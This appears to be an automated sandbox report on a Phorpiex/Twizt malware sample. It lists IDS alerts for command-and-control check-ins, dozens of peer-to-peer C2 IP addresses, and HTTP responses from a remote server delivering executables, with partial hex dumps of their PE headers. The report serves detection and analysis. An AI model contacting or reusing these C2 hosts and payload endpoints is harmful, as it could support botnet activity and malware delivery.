    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 95.56.224.166:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49712 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49635 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49616 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49603 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49624 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49632 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49630 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49637 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 2.181.203.195:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49600 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 89.35.132.112:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49654 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 147.30.105.215:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 79.164.150.28:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49674 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 2.180.93.42:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 146.70.53.161:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 216.107.138.162:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 78.39.225.185:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 178.253.102.216:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49613 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49592 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 95.142.87.201:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49628 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49595 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 95.58.24.170:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 93.180.124.3:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49605 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49625 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49601 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49687 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49594 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:49715 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49639 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49658 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49686 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49598 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49591 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49662 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49659 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49661 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49644 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49618 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 178.88.234.209:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49641 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49692 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49633 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49611 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49622 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49607 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49649 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49693 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49695 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49697 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49673 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49647 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49650 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49689 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49642 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49652 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49656 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49690 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49684 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49645 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49682 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49676 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49615 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.5:49709 -> 185.215.113.66:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49620 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49587 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49627 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49715 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 91.202.233.141:80 -> 192.168.2.5:49715
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49671 -> 91.202.233.141:80
    Contains functionality to check if Internet connection is working
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040ABF0 htons,socket,connect,getsockname, www.update.microsoft.com1_2_0040ABF0
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040ABF0 htons,socket,connect,getsockname, www.update.microsoft.com2_2_0040ABF0
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040ABF0 htons,socket,connect,getsockname, www.update.microsoft.com7_2_0040ABF0
    Source: unknownNetwork traffic detected: IP country count 18
    Source: global trafficTCP traffic: 192.168.2.5:49713 -> 203.188.251.78:40500
    Source: global trafficTCP traffic: 192.168.2.5:49586 -> 92.47.79.250:40500
    Source: global trafficTCP traffic: 192.168.2.5:49593 -> 90.156.161.103:40500
    Source: global trafficTCP traffic: 192.168.2.5:49597 -> 31.171.184.200:40500
    Source: global trafficTCP traffic: 192.168.2.5:49599 -> 217.77.127.213:40500
    Source: global trafficTCP traffic: 192.168.2.5:49602 -> 190.74.239.163:40500
    Source: global trafficTCP traffic: 192.168.2.5:49604 -> 178.88.234.209:40500
    Source: global trafficTCP traffic: 192.168.2.5:49606 -> 5.239.149.199:40500
    Source: global trafficTCP traffic: 192.168.2.5:49609 -> 90.156.167.249:40500
    Source: global trafficTCP traffic: 192.168.2.5:49612 -> 82.200.234.162:40500
    Source: global trafficTCP traffic: 192.168.2.5:49614 -> 78.109.103.103:40500
    Source: global trafficTCP traffic: 192.168.2.5:49617 -> 89.33.234.8:40500
    Source: global trafficTCP traffic: 192.168.2.5:49619 -> 178.88.94.24:40500
    Source: global trafficTCP traffic: 192.168.2.5:49621 -> 81.2.6.166:40500
    Source: global trafficTCP traffic: 192.168.2.5:49623 -> 217.30.162.244:40500
    Source: global trafficTCP traffic: 192.168.2.5:49626 -> 5.239.203.3:40500
    Source: global trafficTCP traffic: 192.168.2.5:49629 -> 2.190.231.214:40500
    Source: global trafficTCP traffic: 192.168.2.5:49631 -> 178.90.38.234:40500
    Source: global trafficTCP traffic: 192.168.2.5:49634 -> 178.34.102.85:40500
    Source: global trafficTCP traffic: 192.168.2.5:49636 -> 90.156.164.120:40500
    Source: global trafficTCP traffic: 192.168.2.5:49638 -> 5.251.14.217:40500
    Source: global trafficTCP traffic: 192.168.2.5:49643 -> 188.17.107.147:40500
    Source: global trafficTCP traffic: 192.168.2.5:49646 -> 89.218.146.134:40500
    Source: global trafficTCP traffic: 192.168.2.5:49648 -> 154.251.113.98:40500
    Source: global trafficTCP traffic: 192.168.2.5:49651 -> 2.133.131.102:40500
    Source: global trafficTCP traffic: 192.168.2.5:49653 -> 212.154.221.106:40500
    Source: global trafficTCP traffic: 192.168.2.5:49655 -> 2.133.238.177:40500
    Source: global trafficTCP traffic: 192.168.2.5:49657 -> 2.190.155.52:40500
    Source: global trafficTCP traffic: 192.168.2.5:49660 -> 178.91.90.11:40500
    Source: global trafficTCP traffic: 192.168.2.5:49663 -> 178.253.102.221:40500
    Source: global trafficTCP traffic: 192.168.2.5:49672 -> 2.180.10.247:40500
    Source: global trafficTCP traffic: 192.168.2.5:49675 -> 109.74.70.126:40500
    Source: global trafficTCP traffic: 192.168.2.5:49680 -> 102.189.206.27:40500
    Source: global trafficTCP traffic: 192.168.2.5:49683 -> 95.142.87.201:40500
    Source: global trafficTCP traffic: 192.168.2.5:49685 -> 5.235.233.26:40500
    Source: global trafficTCP traffic: 192.168.2.5:49688 -> 89.249.62.94:40500
    Source: global trafficTCP traffic: 192.168.2.5:49691 -> 5.232.180.114:40500
    Source: global trafficTCP traffic: 192.168.2.5:49696 -> 213.206.61.228:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 92.244.232.104:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 37.150.149.45:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 5.76.154.73:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 213.206.61.226:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 5.233.112.110:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 2.177.44.200:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 37.151.27.190:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 79.164.150.28:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 213.206.60.173:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 213.206.62.251:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 151.233.107.54:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 93.188.86.253:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 217.30.162.37:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 113.86.140.229:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 146.70.53.161:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 89.236.216.14:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 213.230.99.34:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 147.30.105.215:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 90.156.165.93:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 2.181.203.195:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 216.107.138.162:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 95.56.224.166:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 90.156.163.111:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 82.200.169.222:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 89.218.186.142:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 90.156.166.108:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 178.253.102.216:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 94.183.208.151:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 213.206.62.230:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 95.58.24.170:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 151.232.174.105:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 80.191.192.168:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 89.35.132.112:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 178.129.39.66:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 82.204.215.94:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 2.180.93.42:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 78.39.225.185:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 213.109.253.244:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 93.180.124.3:40500
    Source: global trafficUDP traffic: 192.168.2.5:65203 -> 89.218.244.178:40500
    Source: global trafficTCP traffic: 192.168.2.5:49579 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.5:58631 -> 1.1.1.1:53
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:53:55 GMTContent-Type: application/octet-streamContent-Length: 89600Last-Modified: Sat, 08 Mar 2025 13:08:27 GMTConnection: keep-aliveETag: "67cc414b-15e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4e 53 c8 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 00 00 00 86 00 00 00 00 00 00 00 77 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 26 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 36 00 00 00 00 01 00 00 38 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 4d 00 00 00 40 01 00 00 3c 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:11 GMTContent-Type: application/octet-streamContent-Length: 51712Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-ca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 06 00 00 16 00 00 00 60 00 00 00 00 00 00 fa 22 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 00 00 00 04 00 00 61 d9 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 8b 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 8b 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 14 00 00 00 10 00 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 5d 00 00 00 30 00 00 00 5e 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 ac 0f 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 70 64 61 74 61 00 00 90 00 00 00 00 a0 00 00 00 02 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:17 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 95 d2 6a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 